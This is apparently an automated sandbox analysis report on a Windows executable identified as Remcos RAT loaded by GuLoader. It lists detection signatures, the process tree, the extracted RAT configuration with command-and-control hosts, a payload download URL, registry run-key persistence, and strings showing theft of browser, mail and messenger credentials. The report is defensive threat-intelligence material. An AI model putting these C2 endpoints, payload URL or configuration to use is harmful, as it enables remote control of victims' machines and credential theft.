Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
2T10XBqS6g.exe

Overview

General Information

Sample name:2T10XBqS6g.exe
Analysis ID:1590600
MD5:5266c53649caa9edea2f4ab58d58f511
SHA1:cc4dea13bd65697ef12e10cc404fbebca42f48ee
SHA256:70c1d9f480bba58360e42af222d4c1a3ff7dc5d0f2a6d96b1650dc6076027d52
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected Remcos RAT
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Installs a global keyboard hook
Maps a DLL or memory area into another process
Sigma detected: New RUN Key Pointing to Suspicious Folder
Switches to a custom stack to bypass stack traces
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64native
  • 2T10XBqS6g.exe (PID: 1308 cmdline: "C:\Users\user\Desktop\2T10XBqS6g.exe" MD5: 5266C53649CAA9EDEA2F4AB58D58F511)
    • 2T10XBqS6g.exe (PID: 5392 cmdline: "C:\Users\user\Desktop\2T10XBqS6g.exe" MD5: 5266C53649CAA9EDEA2F4AB58D58F511)
      • 2T10XBqS6g.exe (PID: 1256 cmdline: C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\nvdplctrijrfvwgugtzctlhghmlwqfpj" MD5: 5266C53649CAA9EDEA2F4AB58D58F511)
      • 2T10XBqS6g.exe (PID: 4004 cmdline: C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\qxrz" MD5: 5266C53649CAA9EDEA2F4AB58D58F511)
      • 2T10XBqS6g.exe (PID: 4320 cmdline: C:\Users\user\Desktop\2T10XBqS6g.exe /stext "C:\Users\user\AppData\Local\Temp\arwsnnw" MD5: 5266C53649CAA9EDEA2F4AB58D58F511)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000000.00000002.29608235875.0000000003320000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 3 entries

              System Summary

              barindex
              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2T10XBqS6g.exe, ProcessId: 5392, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Gisne212
              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.bat, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\2T10XBqS6g.exe, ProcessId: 5392, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Gisne212

              Stealing of Sensitive Information

              barindex
              Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\2T10XBqS6g.exe, ProcessId: 5392, TargetFilename: C:\ProgramData\remcos\logs.dat
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T11:06:34.412582+010020327761Malware Command and Control Activity Detected192.168.11.204976743.226.229.2093980TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T11:06:34.965588+010020327771Malware Command and Control Activity Detected43.226.229.2093980192.168.11.2049767TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T11:06:35.990656+010028033043Unknown Traffic192.168.11.2049769178.237.33.5080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-14T11:06:26.452527+010028032702Potentially Bad Traffic192.168.11.2049765109.99.162.14443TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: 2T10XBqS6g.exeAvira: detected
              Source: C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.batAvira: detection malicious, Label: TR/AD.NsisInject.bzfqp
              Source: 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["linktreewealth.zapto.org:3980:0", "linktreewealth.zapto.org:3981:1", "linktreewealthy.zapto.org:3980:0"], "Assigned name": "Manifest", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-0B1XIG", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
              Source: C:\Users\user\AppData\Local\Temp\tissedes\Hovedrevisorat.batReversingLabs: Detection: 31%
              Source: 2T10XBqS6g.exeVirustotal: Detection: 33%Perma Link
              Source: 2T10XBqS6g.exeReversingLabs: Detection: 31%
              Source: Yara matchFile source: 00000002.00000003.29878726360.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665902793.0000000002912000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.30665347634.0000000002906000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000003.29845147265.0000000002910000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: 2T10XBqS6g.exe PID: 5392, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_00404423 GetProcAddress,FreeLibrary,CryptUnprotectData,3_2_00404423
              Source: 2T10XBqS6g.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 109.99.162.14:443 -> 192.168.11.20:49765 version: TLS 1.2
              Source: 2T10XBqS6g.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: mshtml.pdb source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmp
              Source: Binary string: mshtml.pdbUGP source: 2T10XBqS6g.exe, 00000002.00000001.29605579234.0000000000649000.00000020.00000001.01000000.00000006.sdmp
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_004069DF FindFirstFileW,FindClose,0_2_004069DF
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,0_2_00405D8E
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A310F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,LdrInitializeThunk,lstrlenW,LdrInitializeThunk,lstrlenW,FindFirstFileW,LdrInitializeThunk,FindNextFileW,FindClose,2_2_33A310F1
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 2_2_33A36580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,2_2_33A36580
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 3_2_0040AE51 FindFirstFileW,FindNextFileW,3_2_0040AE51
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 4_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,4_2_00407EF8
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeCode function: 5_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,5_2_00407898
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\userJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\Sufferers.GyrJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\Desktop\2T10XBqS6g.exeJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\eftermodnendes\ringeagt\utidige.GauJump to behavior
              Source: C:\Users\user\Desktop\2T10XBqS6g.exeFile opened: C:\Users\user\AppData\Local\Temp\nsg374D.tmpJump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.11.20:49767 -> 43.226.229.209:3980
              Source: Network trafficSuricata IDS: 2032777 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Server Response : 43.226.229.209:3980 -> 192.168.11.20:49767
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealth.zapto.org
              Source: Malware configuration extractorURLs: linktreewealthy.zapto.org
              Source: global trafficTCP traffic: 192.168.11.20:49767 -> 43.226.229.209:3980
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: Joe Sandbox ViewIP Address: 109.99.162.14 109.99.162.14
              Source: Joe Sandbox ViewIP Address: 178.237.33.50 178.237.33.50
              Source: Joe Sandbox ViewASN Name: SOFTLAYERUS SOFTLAYERUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: Network trafficSuricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.11.20:49769 -> 178.237.33.50:80
              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49765 -> 109.99.162.14:443
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /NJrdZqNcCtz102.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: teldrum.roCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: 2T10XBqS6g.exe, 00000003.00000003.29909533860.0000000002328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
              Source: 2T10XBqS6g.exe, 00000003.00000003.29909533860.0000000002328000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"bluecurvetv.shaw.ca"},{"applied_policy":"OnlyExposeWidevine","domain":"helix.videotron.com"},{"applied_policy":"OnlyExposeWidevine","domain":"criterionchannel.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ntathome.com"},{"applied_policy":"OnlyExposeWidevine","domain":"wowpresentsplus.com"},{"applied_policy":"OnlyExposeWidevine","domain":"vhx.tv"},{"applied_policy":"OnlyExposePlayReady","domain":"hulu.com"},{"applied_policy":"OnlyExposeWidevine","domain":"app.quickhelp.com"},{"applied_policy":"OnlyExposeWidevine","domain":"DishAnywhere.com"}],"policies":[{"name":"OnlyExposePlayReady","type":"Playready"},{"name":"OnlyExposeWidevine","type":"Widevine"}],"version":1},"codec_override":{"applications":[{"applied_policy":"HideMfHevcCodec","domain":"tv.apple.com"},{"applied_policy":"HideMfHevcCodec","domain":"nintendo.com"}],"policies":[{"name":"HideMfHevcCodec","type":"MfHevcCodec"}],"version":1},"content_filter_on_off_switch":{"applications":[{"applied_policy":"ContentFilter","domain":"microsoft.com"}],"policies":[{"name":"ContentFilter"}],"version":1},"ecp_override":{"applications":[{"applied_policy":"PlainTextURLsOnly","domain":"hangouts.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"chat.google.com"},{"applied_policy":"PlainTextURLsOnly","domain":"slack.com"},{"applied_policy":"PlainTextURLsOnly","domain":"facebook.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wechat.com"},{"applied_policy":"PlainTextURLsOnly","domain":"weixin.com"},{"applied_policy":"PlainTextURLsOnly","domain":"qq.com"},{"applied_policy":"PlainTextURLsOnly","domain":"webex.com"},{"applied_policy":"PlainTextURLsOnly","domain":"wordpress.com"},{"applied_policy":"PlainTextURLsOnly","domain":"twitter.com"},{"applied_policy":"PlainTextURLsOnly","domain":"discord.com"}],"policies":[{"name":"PlainTextURLsOnly","type":"ECPOnlyPlaintextURLs"}],"version":1},"idl_override":{"applications":[{"applied_policy":"ExposePrefixedEME","domain":"netflix.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.jp"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.co.uk"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.de"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.es"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.fr"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.in"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.it"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.ca"},{"applied_policy":"ExposePrefixedEME","domain":"music.amazon.com.br"},{"applied_policy":"ExposePrefixedEME","domain":"sling.com"},{"applied_policy":"ExposePre
              Source: 2T10XBqS6g.exe, 00000003.00000002.29915367921.0000000002B12000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29912441543.0000000002B11000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29912000808.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: .povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt equals www.facebook.com (Facebook)
              Source: 2T10XBqS6g.exe, 00000002.00000002.30678074728.0000000033A00000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
              Source: 2T10XBqS6g.exe, 00000003.00000003.29910892852.0000000002B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt equals www.facebook.com (Facebook)
              Source: 2T10XBqS6g.exe, 2T10XBqS6g.exe, 00000005.00000002.29883097012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
              Source: 2T10XBqS6g.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: 2T10XBqS6g.exe, 00000003.00000003.29910013869.0000000002317000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909567301.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909703869.0000000002319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.facebook.com (Facebook)
              Source: 2T10XBqS6g.exe, 00000003.00000003.29910013869.0000000002317000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909567301.0000000002319000.00000004.00000020.00020000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000003.29909703869.0000000002319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/loginv!Tv!Tv equals www.yahoo.com (Yahoo)
              Source: 2T10XBqS6g.exe, 00000002.00000002.30677721055.0000000033910000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
              Source: 2T10XBqS6g.exe, 00000002.00000002.30677721055.0000000033910000.00000040.10000000.00040000.00000000.sdmp, 2T10XBqS6g.exe, 00000003.00000002.29913943962.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
              Source: global trafficDNS traffic detected: DNS query: teldrum.ro
              Source: global trafficDNS traffic detected: DNS query: linktreewealth.zapto.org
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertCloudServicesCA-1.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG3.crt0B
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA-2.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1-1.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSHybridECCSHA3842020CA1.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.geotrust.com/GeoTrustECCCA2018.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cacerts.thawte.com/ThawteRSACA2018.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cdp.geotrust.com/GeoTrustECCCA2018.crl0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://cdp.thawte.com/ThawteRSACA2018.crl0L
              Source: bhvF184.tmp.3.drString found in binary or memory: http://certificates.godaddy.com/repository/0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://certificates.godaddy.com/repository/gdig2.crt0
              Source: bhvF184.tmp.3.drString found in binary or memory: http://certs.godaddy.com/repository/1301
              Source: bhvF184.tmp.3.drString found in binary or memory: http://contentstorage.osi.office.net/
              Source: bhvF184.tmp.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
